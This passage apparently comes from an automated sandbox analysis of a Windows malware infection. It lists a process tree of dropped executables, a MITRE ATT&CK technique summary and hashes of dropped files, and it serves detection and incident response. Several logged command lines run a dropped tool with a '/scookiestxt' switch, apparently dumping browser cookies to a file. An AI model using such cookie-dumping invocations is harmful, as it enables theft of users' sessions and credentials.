                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4600
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5832
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4672
                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                        1⤵
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1952
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                          2⤵
                                                                                          • Drops file in System32 directory
                                                                                          • Checks processor information in registry
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Modifies registry class
                                                                                          PID:3132
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                        1⤵
                                                                                        • Drops file in Windows directory
                                                                                        • Modifies Internet Explorer settings
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:4704
                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                        1⤵
                                                                                        • Modifies Internet Explorer settings
                                                                                        PID:4748
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:5036
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies Internet Explorer settings
                                                                                        • Modifies registry class
                                                                                        PID:1968
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:5340
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:5824
                                                                                      • C:\Windows\servicing\TrustedInstaller.exe
                                                                                        C:\Windows\servicing\TrustedInstaller.exe
                                                                                        1⤵
                                                                                          PID:5648
                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                          1⤵
                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                          PID:4052
                                                                                        • C:\Users\Admin\AppData\Local\Temp\128A.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\128A.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:5936
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1673.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\1673.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:1676
                                                                                        • C:\Users\Admin\AppData\Local\Temp\2048.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\2048.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5072
                                                                                        • C:\Users\Admin\AppData\Local\Temp\2876.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\2876.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4232
                                                                                        • C:\Users\Admin\AppData\Local\Temp\370E.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\370E.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:2240
                                                                                          • C:\Users\Admin\AppData\Roaming\RegWorkshop\RegWorkshop.exe
                                                                                            C:\Users\Admin\AppData\Roaming\RegWorkshop\RegWorkshop.exe
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:1920
                                                                                        • C:\Users\Admin\AppData\Local\Temp\3BE1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\3BE1.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4624
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                            PID:5160
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:6080
                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                            1⤵
                                                                                              PID:4256
                                                                                            • C:\Windows\explorer.exe
                                                                                              C:\Windows\explorer.exe
                                                                                              1⤵
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:5416
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                              1⤵
                                                                                                PID:4972
                                                                                              • C:\Windows\explorer.exe
                                                                                                C:\Windows\explorer.exe
                                                                                                1⤵
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:5020
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:5688
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe
                                                                                                  1⤵
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:2204
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:4776
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                    1⤵
                                                                                                      PID:2160
                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                      1⤵
                                                                                                        PID:5848
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                        1⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:5184
                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                        1⤵
                                                                                                        • Modifies Internet Explorer settings
                                                                                                        PID:2708
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:4504
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:1060
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:1676

                                                                                                      Network

                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                      Persistence

                                                                                                      Registry Run Keys / Startup Folder

                                                                                                      1
                                                                                                      T1060

                                                                                                      BITS Jobs

                                                                                                      1
                                                                                                      T1197

                                                                                                      Defense Evasion

                                                                                                      Modify Registry

                                                                                                      3
                                                                                                      T1112

                                                                                                      BITS Jobs

                                                                                                      1
                                                                                                      T1197

                                                                                                      Install Root Certificate

                                                                                                      1
                                                                                                      T1130

                                                                                                      Credential Access

                                                                                                      Credentials in Files

                                                                                                      4
                                                                                                      T1081

                                                                                                      Discovery

                                                                                                      Software Discovery

                                                                                                      1
                                                                                                      T1518

                                                                                                      Query Registry

                                                                                                      4
                                                                                                      T1012

                                                                                                      System Information Discovery

                                                                                                      5
                                                                                                      T1082

                                                                                                      Security Software Discovery

                                                                                                      1
                                                                                                      T1063

                                                                                                      Peripheral Device Discovery

                                                                                                      1
                                                                                                      T1120

                                                                                                      Remote System Discovery

                                                                                                      1
                                                                                                      T1018

                                                                                                      Collection

                                                                                                      Data from Local System

                                                                                                      4
                                                                                                      T1005

                                                                                                      Command and Control

                                                                                                      Web Service

                                                                                                      1
                                                                                                      T1102

                                                                                                      Replay Monitor

                                                                                                      Loading Replay Monitor...

                                                                                                      Downloads

                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                        MD5

                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                        SHA1

                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                        SHA256

                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                        SHA512

                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                        MD5

                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                        SHA1

                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                        SHA256

                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                        SHA512

                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                      • C:\Program Files\MSBuild\ROQQPIEHVC\ultramediaburner.exe
                                                                                                        MD5

                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                        SHA1

                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                        SHA256

                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                        SHA512

                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                      • C:\Program Files\MSBuild\ROQQPIEHVC\ultramediaburner.exe
                                                                                                        MD5

                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                        SHA1

                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                        SHA256

                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                        SHA512

                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                      • C:\Program Files\install.dat
                                                                                                        MD5

                                                                                                        806c3221a013fec9530762750556c332

                                                                                                        SHA1

                                                                                                        36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                        SHA256

                                                                                                        9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                        SHA512

                                                                                                        56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                      • C:\Program Files\install.dat
                                                                                                        MD5

                                                                                                        31e4a5735b20be6a53cbb552663b1cc3

                                                                                                        SHA1

                                                                                                        c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                        SHA256

                                                                                                        b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                        SHA512

                                                                                                        3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                      • C:\Program Files\install.dll
                                                                                                        MD5

                                                                                                        fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                        SHA1

                                                                                                        6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                        SHA256

                                                                                                        9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                        SHA512

                                                                                                        0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                      • C:\Program Files\install.dll
                                                                                                        MD5

                                                                                                        fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                        SHA1

                                                                                                        6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                        SHA256

                                                                                                        9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                        SHA512

                                                                                                        0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                      • C:\Program Files\libEGL.dll
                                                                                                        MD5

                                                                                                        cc0f81a657d6887e246f49151e60123d

                                                                                                        SHA1

                                                                                                        1eb31528501c375817853e09d95b7152858c5b31

                                                                                                        SHA256

                                                                                                        31fd8f7d1ab67c7b4f332d2d4518b99d2bb344ac577044b44551cd7e6f58dbbb

                                                                                                        SHA512

                                                                                                        8ad3af4b0fef41dc20965429fd4dbb699131e92277f14c8af5882970fd192820c0f0e1a8369dbc8471fcb09fe778fb708c57dfdfcacd14cd6e84a238fcc84198

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                        MD5

                                                                                                        4c8fe6b2f96e01a5a6d418a7f1c843a7

                                                                                                        SHA1

                                                                                                        51842e81863c205e888bffe034a3abbf642c5419

                                                                                                        SHA256

                                                                                                        e6272d58a61f01f31f18f7b4ecc85232a1e71be4b9e93570395ad825e5ca6afa

                                                                                                        SHA512

                                                                                                        209986a1b77f039dac3c4e51a7c2a54af77b47261373e4f97290c8de21511dc181549ce656585c546ef616922aef5ee88f9d3cc98ae98e2b426dd4072688824a

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                        MD5

                                                                                                        745db20fd3e289a001fd17d7e73c7b28

                                                                                                        SHA1

                                                                                                        6e99d180a44e0f9226672e9c5cfd796561f3e619

                                                                                                        SHA256

                                                                                                        d1e8b6205077152ab171194ebac11a5a6afa62be991643d99d7831412eea96c4

                                                                                                        SHA512

                                                                                                        8a33dcef7f679f12c34151b0dbacbe738d0d46c75e73f67a93d494117c04376ea3a52ffa5b8adf8b319b380f690b444d2fa1db8d195587bfe938a716869a7a42

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                        MD5

                                                                                                        60f6b2c801a2a958b06c893b74b19282

                                                                                                        SHA1

                                                                                                        da0e286f2d50cc4f731f3fcec60de23069faf17f

                                                                                                        SHA256

                                                                                                        593de34d0c7012a797f118d197186c85f0bd1fd4d3a70fa84e3ea89f9f980032

                                                                                                        SHA512

                                                                                                        406ca703da00617705fbe0c5b9f6be656fffd3f43a8f68e6ccff78e24e5ef8b024f3f2dd1a28d63888abab10aacdab3a78bce0f2656e08b373e4ef8b0717833d

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                        MD5

                                                                                                        293f582bda12ee5da53afdeb96773fd9

                                                                                                        SHA1

                                                                                                        69d71c195e8b0f94dc14409d6d50d9fc8e5cec88

                                                                                                        SHA256

                                                                                                        4531f58b9e22a7306ef304f5c5d2c803a37311ba7d5b13c4494e62cdefde79ca

                                                                                                        SHA512

                                                                                                        77e46f45e1d9a8f36610b6d4cd8dc9354bdc52a8f6869bd9961cd255c5b69bf5a6232b15dc68bb437731af54b8ca3daea15eb6659f564bd2fdc5c2619d34511c

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                        MD5

                                                                                                        4fb428b0bf16e09a864b40f9ea5fd902

                                                                                                        SHA1

                                                                                                        530af479adfd1e4c10851a74f6ce86e8ccff9483

                                                                                                        SHA256

                                                                                                        3e0ec9739f1760e463c1cee5b9bcc6d8abf5b9a0d2f4085405edd06367cd83f7

                                                                                                        SHA512

                                                                                                        ef6d87ea0797c1f0d2f3da0bfbf39e3a5c4fa1c8e9e7fe495e014f5ea823ceb61cf419642c86495433804873f3690db31d1da1eac92d2a2ce6c9ee2bea138c45

                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                        MD5

                                                                                                        48288bc0ddfe3179b39902b24fb4e8d7

                                                                                                        SHA1

                                                                                                        f43c1afa21e128b42fe077dbe67bfda12603cdba

                                                                                                        SHA256

                                                                                                        2efabedba521091f397404e856dfc4934f400ea92a00786153f3becfa09dc693

                                                                                                        SHA512

                                                                                                        f3d2f1e2f5a2d8b33d62dd3f4138ca55967eff9deb636e7313ea609f1f4eac12335e08788b0a7cb345938a6453ebdfd5a156990f344af26acb8cd91061d4cf84

                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\C63MWH2F.cookie
                                                                                                        MD5

                                                                                                        bbbb8f6192fe807dd451bf696a5ae05e

                                                                                                        SHA1

                                                                                                        af9be5fcb925f12f83826f74a1a7a44f84dec6f7

                                                                                                        SHA256

                                                                                                        916826879f556cdd75e65827c78480b27efb0a5bf10b1c8481905b7fff6aa176

                                                                                                        SHA512

                                                                                                        674f4ccd799cb09dae43f9f059f7d6e99cec51c560a9ff0718b70d0f75e425d7b089d6e2db4b3ccf3f11e6f3d9a41f18eec686514e3596287205aa9d9caa4661

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1f-eae32-3a4-fb895-1b48e6f6db48f\Kenessey.txt
                                                                                                        MD5

                                                                                                        97384261b8bbf966df16e5ad509922db

                                                                                                        SHA1

                                                                                                        2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                        SHA256

                                                                                                        9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                        SHA512

                                                                                                        b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1f-eae32-3a4-fb895-1b48e6f6db48f\Tevaesurama.exe
                                                                                                        MD5

                                                                                                        2e91d25073151415f8c39de2262cbba8

                                                                                                        SHA1

                                                                                                        32544481a34273a1a870822152d201ea9c19b34d

                                                                                                        SHA256

                                                                                                        0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                        SHA512

                                                                                                        306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1f-eae32-3a4-fb895-1b48e6f6db48f\Tevaesurama.exe
                                                                                                        MD5

                                                                                                        2e91d25073151415f8c39de2262cbba8

                                                                                                        SHA1

                                                                                                        32544481a34273a1a870822152d201ea9c19b34d

                                                                                                        SHA256

                                                                                                        0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                        SHA512

                                                                                                        306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1f-eae32-3a4-fb895-1b48e6f6db48f\Tevaesurama.exe.config
                                                                                                        MD5

                                                                                                        98d2687aec923f98c37f7cda8de0eb19

                                                                                                        SHA1

                                                                                                        f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                        SHA256

                                                                                                        8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                        SHA512

                                                                                                        95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2gxkhs0x.awn\google-game.exe
                                                                                                        MD5

                                                                                                        e27c391b1f65a77478fcab4d5e102cef

                                                                                                        SHA1

                                                                                                        44fa8a89ce66580e1561e0e6c72f9c440251522c

                                                                                                        SHA256

                                                                                                        2f4c3dd5cdc9982231f31e9fed7be3d8be472252fb1760c17e28c2c13514aed6

                                                                                                        SHA512

                                                                                                        0ffad244820443af18cc184131ab33437da6b957e9f41ddbf945a2e3d86d529c0b2fccdab069ff033c6d9d0bacab3843d55cd93b2353f9dfda892be48df608ff

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2gxkhs0x.awn\google-game.exe
                                                                                                        MD5

                                                                                                        e27c391b1f65a77478fcab4d5e102cef

                                                                                                        SHA1

                                                                                                        44fa8a89ce66580e1561e0e6c72f9c440251522c

                                                                                                        SHA256

                                                                                                        2f4c3dd5cdc9982231f31e9fed7be3d8be472252fb1760c17e28c2c13514aed6

                                                                                                        SHA512

                                                                                                        0ffad244820443af18cc184131ab33437da6b957e9f41ddbf945a2e3d86d529c0b2fccdab069ff033c6d9d0bacab3843d55cd93b2353f9dfda892be48df608ff

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3fxi1kdm.ydx\md1_1eaf.exe
                                                                                                        MD5

                                                                                                        cab26fc1758257aac89b39dcceeb37b0

                                                                                                        SHA1

                                                                                                        d030ca491156038a4da2c3858e08f0299cf79860

                                                                                                        SHA256

                                                                                                        2493a872d48776117481536841a532b347705c289af4f5aaf87b86e51718a8ec

                                                                                                        SHA512

                                                                                                        c88a0b96f5037af4e15daefc7450baa9fa68ecc387995233cdcde5b6057f3804c862aaa1347014058dcdbc96f2d90f54b1bfd903cf6a7b77750abefa80c76511

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3fxi1kdm.ydx\md1_1eaf.exe
                                                                                                        MD5

                                                                                                        cab26fc1758257aac89b39dcceeb37b0

                                                                                                        SHA1

                                                                                                        d030ca491156038a4da2c3858e08f0299cf79860

                                                                                                        SHA256

                                                                                                        2493a872d48776117481536841a532b347705c289af4f5aaf87b86e51718a8ec

                                                                                                        SHA512

                                                                                                        c88a0b96f5037af4e15daefc7450baa9fa68ecc387995233cdcde5b6057f3804c862aaa1347014058dcdbc96f2d90f54b1bfd903cf6a7b77750abefa80c76511

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\50ccu00x.o2a\GcleanerWW.exe
                                                                                                        MD5

                                                                                                        4f4adcbf8c6f66dcfc8a3282ac2bf10a

                                                                                                        SHA1

                                                                                                        c35a9fc52bb556c79f8fa540df587a2bf465b940

                                                                                                        SHA256

                                                                                                        6b3c238ebcf1f3c07cf0e556faa82c6b8fe96840ff4b6b7e9962a2d855843a0b

                                                                                                        SHA512

                                                                                                        0d15d65c1a988dfc8cc58f515a9bb56cbaf1ff5cb0a5554700bc9af20a26c0470a83c8eb46e16175154a6bcaad7e280bbfd837a768f9f094da770b7bd3849f88

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\55-dafe0-3c7-d5ba9-7ff742dde6d44\Denuzhoqaehe.exe
                                                                                                        MD5

                                                                                                        18e49540637bccc9b3a7ca3d48cae223

                                                                                                        SHA1

                                                                                                        b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                        SHA256

                                                                                                        698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                        SHA512

                                                                                                        a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\55-dafe0-3c7-d5ba9-7ff742dde6d44\Denuzhoqaehe.exe
                                                                                                        MD5

                                                                                                        18e49540637bccc9b3a7ca3d48cae223

                                                                                                        SHA1

                                                                                                        b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                        SHA256

                                                                                                        698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                        SHA512

                                                                                                        a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\55-dafe0-3c7-d5ba9-7ff742dde6d44\Denuzhoqaehe.exe.config
                                                                                                        MD5

                                                                                                        98d2687aec923f98c37f7cda8de0eb19

                                                                                                        SHA1

                                                                                                        f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                        SHA256

                                                                                                        8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                        SHA512

                                                                                                        95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                        MD5

                                                                                                        41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                        SHA1

                                                                                                        0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                        SHA256

                                                                                                        97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                        SHA512

                                                                                                        5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                        MD5

                                                                                                        41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                        SHA1

                                                                                                        0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                        SHA256

